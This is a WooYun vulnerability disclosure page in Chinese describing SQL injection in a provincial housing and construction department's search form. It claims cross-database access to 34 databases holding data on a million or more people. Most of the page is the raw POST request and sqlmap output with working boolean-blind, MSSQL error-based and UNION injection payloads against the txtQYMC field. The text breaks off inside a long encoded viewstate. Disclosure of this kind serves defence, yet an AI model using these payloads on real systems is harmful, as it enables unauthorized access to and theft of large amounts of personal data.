当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0213632

漏洞标题:某省住房和城乡建设厅SQL注入涉及上百万的人员信息(可跨库查询)

相关厂商:某省住房和城乡建设厅

漏洞作者: 路人甲

提交时间:2016-05-28 11:03

修复时间:2016-07-15 14:10

公开时间:2016-07-15 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-28: 细节已通知厂商并且等待厂商处理中
2016-05-31: 厂商已经确认,细节仅向厂商公开
2016-06-10: 细节向核心白帽子及相关领域专家公开
2016-06-20: 细节向普通白帽子公开
2016-06-30: 细节向实习白帽子公开
2016-07-15: 细节向公众公开

简要描述:

详细说明:

问题站点:http://**.**.**.**/zzcx/zhiliang/index.htm
总共有34个数据库,涉及的数据很庞大。
注入点为搜索框,字段为:txtQYMC

POST http://**.**.**.**/zzcx/zhiliang/chaxun.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/zzcx/zhiliang/chaxun.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2266
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTQ3NDg2NDcxNA9kFgICAw9kFg5mDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQRRWVNEHg1EYXRhVGV4dEZpZWxkBQRRWVNEHgtfIURhdGFCb3VuZGdkEBUUBuWFqOecgQnmrabmsYnluIIJ5r2c5rGf5biCCeilhOaoiuW4ggnnpZ7lhpzmnrYJ5a6c5piM5biCCeWtneaEn%2BW4ggnphILlt57luIIJ5LuZ5qGD5biCCeiNhumXqOW4ggnljYHloLDluIIJ5ZK45a6B5biCCeWkqemXqOW4ggnpu4TlhojluIIJ6ZqP5bee5biCCem7hOefs%2BW4ggnojYblt57luIIJ5oGp5pa95beeCeecgeebtOi%2BlgzkuK3lpK7lnKjphIIVFAblhajnnIEJ5q2m5rGJ5biCCea9nOaxn%2BW4ggnopYTmqIrluIIJ56We5Yac5p62CeWunOaYjOW4ggnlrZ3mhJ%2FluIIJ6YSC5bee5biCCeS7meahg%2BW4ggnojYbpl6jluIIJ5Y2B5aCw5biCCeWSuOWugeW4ggnlpKnpl6jluIIJ6buE5YaI5biCCemaj%2BW3nuW4ggnpu4Tnn7PluIIJ6I2G5bee5biCCeaBqeaWveW3ngnnnIHnm7TovpYM5Lit5aSu5Zyo6YSCFCsDFGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAQ8QDxYGHwAFCE5BTUVDT0RFHwEFBE5BTUUfAmdkEBUPBuWFqOmDqB7ln47kuaHop4TliJLnvJbliLbljZXkvY3otYTotKge5bu66K6%2B5bel56iL5YuY5a%2Bf5LyB5Lia6LWE6LSoHuW7uuiuvuW3peeoi%2BiuvuiuoeS8geS4mui1hOi0qCrlt6XnqIvlu7rorr7pobnnm67mi5vmoIfku6PnkIbmnLrmnoTotYTmoLwe5bel56iL6YCg5Lu35ZKo6K%2Bi5LyB5Lia6LWE6LSoGOW3peeoi%2BebkeeQhuS8geS4mui1hOi0qBblu7rnrZHkuJrkvIHkuJrotYTotKggLeW7uuiuvuW3peeoi%2BiuvuiuoeaWveW3peS4gOS9k%2BWMluS8geS4mui1hOi0qCflu7rnrZHmlr3lt6XkvIHkuJrlronlhajnlJ%2Fkuqforrjlj6%2For4Ek5bu66K6%2B5bel56iL6LSo6YeP5qOA5rWL5py65p6E6LWE6LSoG%2BaIv%2BWcsOS6p%2BW8gOWPkeS8geS4mui1hOi0qBvmiL%2FlnLDkuqfkvLDku7fmnLrmnoTotYTotKgY54mp5Lia5pyN5Yqh5LyB5Lia6LWE6LSoHuWfjuW4guWbreael%2Be7v%2BWMluS8geS4mui1hOi0qBUPAzEwMAMxMDEDMTAyAzEwMwMxMDQDMTA1AzEwNgMxMDcDMTA4AzEwOQMxMTADMTExAzExMgMxMTMDMTE0FCsDD2hoaGhoaGhoaGhnaGhoaBYBAgpkAgIPEGRkFgBkAgMPEGRkFgBkAgQPEGRkFgBkAgUPEGRkFgBkAgkPPCsADQEADxYCHgdWaXNpYmxlaGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxpbWdidXRTZWFyY2gFBmd2cXl6eg9nZIKuWvlPHqbjigyQtXpAC%2B%2Fwbnyg&__EVENTVALIDATION=%2FwEWKAKa3cjzCgLc7%2BaFDgLO%2BaTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji%2FCgKH3symCgKqxc%2FACAKDt%2F%2FtCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs%2FACALo1ruyCwLuqc7ACAKfo%2Bz6CwLvh7iWAwLhp%2BGSBwKUosHTAwLs0fnfDAKB6N%2BqAgKa%2F72BCAK%2FlpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm%2Br1DQKpssjAAwLs0f3fDAKB6NOqAgKa%2F7GBCAK%2FlpacDgLQrPTqAwLF%2F%2FTlBwLCsInJAwKU9djxChAXBH%2B0OhYlYMDw6t2%2Fcxj7Bz9o&RBUTCity=%E5%85%A8%E7%9C%81&RBUTzzlb=110&txtQYMC=%E5%BB%BA&imgbutSearch.x=47&imgbutSearch.y=6


sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: txtQYMC (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWKAKuwI7wBgLc7+aFDgLO+aTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji/CgKH3symCgKqxc/ACAKDt//tCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs/ACALo1ruyCwLuqc7ACAKfo+z6CwLvh7iWAwLhp+GSBwKUosHTAwLs0fnfDAKB6N+qAgKa/72BCAK/lpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm+r1DQKpssjAAwLs0f3fDAKB6NOqAgKa/7GBCAK/lpacDgLQrPTqAwLF//TlBwLCsInJAwKU9djxCrhj2q0/uwu2S8OOpc6ZyKAH8Syi&RBUTCity=%E5%85%A8%E7%9C%81&RBUTzzlb=110&txtQYMC=%E5%BB%BA%' AND 3983=3983 AND '%'='&imgbutSearch.x=47&imgbutSearch.y=6
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWKAKuwI7wBgLc7+aFDgLO+aTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji/CgKH3symCgKqxc/ACAKDt//tCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs/ACALo1ruyCwLuqc7ACAKfo+z6CwLvh7iWAwLhp+GSBwKUosHTAwLs0fnfDAKB6N+qAgKa/72BCAK/lpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm+r1DQKpssjAAwLs0f3fDAKB6NOqAgKa/7GBCAK/lpacDgLQrPTqAwLF//TlBwLCsInJAwKU9djxCrhj2q0/uwu2S8OOpc6ZyKAH8Syi&RBUTCity=%E5%85%A8%E7%9C%81&RBUTzzlb=110&txtQYMC=%E5%BB%BA%' AND 4851=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4851=4851) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(113))) AND '%'='&imgbutSearch.x=47&imgbutSearch.y=6
    Type: UNION query
    Title: Generic UNION query (NULL) - 50 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTQ3NDg2NDcxNA9kFgICAw9kFhBmDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQRRWVNEHg1EYXRhVGV4dEZpZWxkBQRRWVNEHgtfIURhdGFCb3VuZGdkEBUUBuWFqOecgQnmrabmsYnluIIJ5r2c5rGf5biCCeilhOaoiuW4ggnnpZ7lhpzmnrYJ5a6c5piM5biCCeWtneaEn+W4ggnphILlt57luIIJ5LuZ5qGD5biCCeiNhumXqOW4ggnljYHloLDluIIJ5ZK45a6B5biCCeWkqemXqOW4ggnpu4TlhojluIIJ6ZqP5bee5biCCem7hOefs+W4ggnojYblt57luIIJ5oGp5pa95beeCeecgeebtOi+lgzkuK3lpK7lnKjphIIVFAblhajnnIEJ5q2m5rGJ5biCCea9nOaxn+W4ggnopYTmqIrluIIJ56We5Yac5p62C